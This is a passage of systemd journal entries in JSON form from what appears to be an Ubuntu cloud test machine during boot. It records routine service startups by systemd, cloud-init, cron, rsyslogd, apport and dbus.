"/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o. o ooo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ce;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cf;b=e2b08827b5804427b422c10c84f1567e;m=2a5be59;t=5bd16df693dc1;x=a21ce3aac33b82b6", "__REALTIME_TIMESTAMP" : "1615280818699713", "__MONOTONIC_TIMESTAMP" : "44416601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "43924614", "MESSAGE" : "new mount options do not match the existing superblock, will be ignored" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d0;b=e2b08827b5804427b422c10c84f1567e;m=2a5bff9;t=5bd16df693f60;x=edb88feae3407441", "__REALTIME_TIMESTAMP" : "1615280818700128", "__MONOTONIC_TIMESTAMP" : "44417017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Started Initial cloud-init job (metadata service crawler).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817868317" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d1;b=e2b08827b5804427b422c10c84f1567e;m=2a5c692;t=5bd16df6945f9;x=c1ed6e345db6ff96", "__REALTIME_TIMESTAMP" : "1615280818701817", "__MONOTONIC_TIMESTAMP" : "44418706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "MESSAGE" : "(CRON) INFO (pidfile fd = 3)", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818087625" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d2;b=e2b08827b5804427b422c10c84f1567e;m=2a5cf41;t=5bd16df694ea8;x=9950e60fc01aa9cd", "__REALTIME_TIMESTAMP" : "1615280818704040", "__MONOTONIC_TIMESTAMP" : "44420929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network is Online.", "UNIT" : "network-online.target", "INVOCATION_ID" : "4d22c778885949648c8d9a9eb1486c98", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817876257" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d3;b=e2b08827b5804427b422c10c84f1567e;m=2a5cfba;t=5bd16df694f21;x=8bd8695305210409", "__REALTIME_TIMESTAMP" : "1615280818704161", "__MONOTONIC_TIMESTAMP" : "44421050", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "MESSAGE" : "(CRON) INFO (Running @reboot jobs)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818107817" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d4;b=e2b08827b5804427b422c10c84f1567e;m=2a5d1e9;t=5bd16df695151;x=4db369ca3a42343e", "__REALTIME_TIMESTAMP" : "1615280818704721", "__MONOTONIC_TIMESTAMP" : "44421609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Availability of block devices...", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817886457" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d5;b=e2b08827b5804427b422c10c84f1567e;m=2a5d25e;t=5bd16df6951c5;x=371ffaea4bdf3918", "__REALTIME_TIMESTAMP" : 
"1615280818704837", "__MONOTONIC_TIMESTAMP" : "44421726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "/usr/sbin/irqbalance", "MESSAGE" : "Balancing is ineffective on systems with a single cpu. Shutting down", "_PID" : "782", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818187602" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d6;b=e2b08827b5804427b422c10c84f1567e;m=2a5d5e2;t=5bd16df69554a;x=544700d31beb3d6a", "__REALTIME_TIMESTAMP" : "1615280818705738", "__MONOTONIC_TIMESTAMP" : "44422626", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems (Pre).", "UNIT" : "remote-fs-pre.target", "INVOCATION_ID" : "a4fe2657835244df874ebd49c332eb72", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817892939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d7;b=e2b08827b5804427b422c10c84f1567e;m=2a5d657;t=5bd16df6955be;x=197acb999049c61f", "__REALTIME_TIMESTAMP" : "1615280818705854", "__MONOTONIC_TIMESTAMP" : "44422743", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" 
: "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "MESSAGE" : "imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd. [v8.32.0]", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301187" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d8;b=e2b08827b5804427b422c10c84f1567e;m=2a5dad1;t=5bd16df695a38;x=d1561caffd4754f8", "__REALTIME_TIMESTAMP" : "1615280818707000", "__MONOTONIC_TIMESTAMP" : "44423889", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems.", "UNIT" : "remote-fs.target", "INVOCATION_ID" : "a3e41334d93141efa0b57ed8ea417097", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817901028" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d9;b=e2b08827b5804427b422c10c84f1567e;m=2a5dbc7;t=5bd16df695b2f;x=d8bf11f61bdd7d75", "__REALTIME_TIMESTAMP" : "1615280818707247", "__MONOTONIC_TIMESTAMP" : "44424135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's groupid changed to 106", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2da;b=e2b08827b5804427b422c10c84f1567e;m=2a5df4a;t=5bd16df695eb1;x=389021366b3d61c8", "__REALTIME_TIMESTAMP" : "1615280818708145", "__MONOTONIC_TIMESTAMP" : "44425034", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-config availability.", "UNIT" : "cloud-config.target", "INVOCATION_ID" : "6c409315f2ba4f0f91c56317ab4bf1d9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817907846" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2db;b=e2b08827b5804427b422c10c84f1567e;m=2a5e441;t=5bd16df6963a9;x=274d74540f94b061", "__REALTIME_TIMESTAMP" : "1615280818709417", 
"__MONOTONIC_TIMESTAMP" : "44426305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's userid changed to 102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301199" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dc;b=e2b08827b5804427b422c10c84f1567e;m=2a5e5a5;t=5bd16df69650c;x=f921319dbb3c7da1", "__REALTIME_TIMESTAMP" : "1615280818709772", "__MONOTONIC_TIMESTAMP" : "44426661", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target System Initialization.", "UNIT" : "sysinit.target", "INVOCATION_ID" : "8489ce32bede4baeaa643a785a33c2a1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817915640" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dd;b=e2b08827b5804427b422c10c84f1567e;m=2a5e61e;t=5bd16df696586;x=5c3f5f0781ff18d7", "__REALTIME_TIMESTAMP" : "1615280818709894", "__MONOTONIC_TIMESTAMP" : "44426782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : " [origin software=\"rsyslogd\" swVersion=\"8.32.0\" x-pid=\"783\" x-info=\"http://www.rsyslog.com\"] start", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301202" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2de;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=7cfa936fa298e955", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "MESSAGE" : " * Starting automatic crash report generation: apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2df;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=880efa6ed3af31bd", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e0;b=e2b08827b5804427b422c10c84f1567e;m=2a5e7fb;t=5bd16df696763;x=ca7481cda5aeaab1", "__REALTIME_TIMESTAMP" : "1615280818710371", "__MONOTONIC_TIMESTAMP" : "44427259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on UUID daemon activation socket.", "UNIT" : "uuidd.socket", "INVOCATION_ID" : "5e99b229418347f591bf5e5be417071b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817920686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e1;b=e2b08827b5804427b422c10c84f1567e;m=2a5e899;t=5bd16df696800;x=7b7d3b6d6b045b24", "__REALTIME_TIMESTAMP" : "1615280818710528", "__MONOTONIC_TIMESTAMP" : "44427417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "MESSAGE" : "client sent 
challenge to [https://entropy.ubuntu.com/]", "_PID" : "812", "_UID" : "110", "_GID" : "1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818308095" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e2;b=e2b08827b5804427b422c10c84f1567e;m=2a5eb55;t=5bd16df696abc;x=2f156472965a9002", "__REALTIME_TIMESTAMP" : "1615280818711228", "__MONOTONIC_TIMESTAMP" : "44428117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Socket activation for snappy daemon.", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817929481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e3;b=e2b08827b5804427b422c10c84f1567e;m=2a5ebba;t=5bd16df696b22;x=4966d0287197bbc5", "__REALTIME_TIMESTAMP" : "1615280818711330", "__MONOTONIC_TIMESTAMP" : "44428218", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "MESSAGE" : "[system] AppArmor D-Bus mediation is enabled", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system 
--address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818332886" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e4;b=e2b08827b5804427b422c10c84f1567e;m=2a5f395;t=5bd16df6972fc;x=cacb4ca893e9e258", "__REALTIME_TIMESTAMP" : "1615280818713340", "__MONOTONIC_TIMESTAMP" : "44430229", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Message of the Day.", "UNIT" : "motd-news.timer", "INVOCATION_ID" : "8863f0fafcad47bcad4c71fc9fa92ebd", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817940642" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e5;b=e2b08827b5804427b422c10c84f1567e;m=2a5f427;t=5bd16df69738f;x=de32ed590e437342", "__REALTIME_TIMESTAMP" : "1615280818713487", "__MONOTONIC_TIMESTAMP" : "44430375", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" 
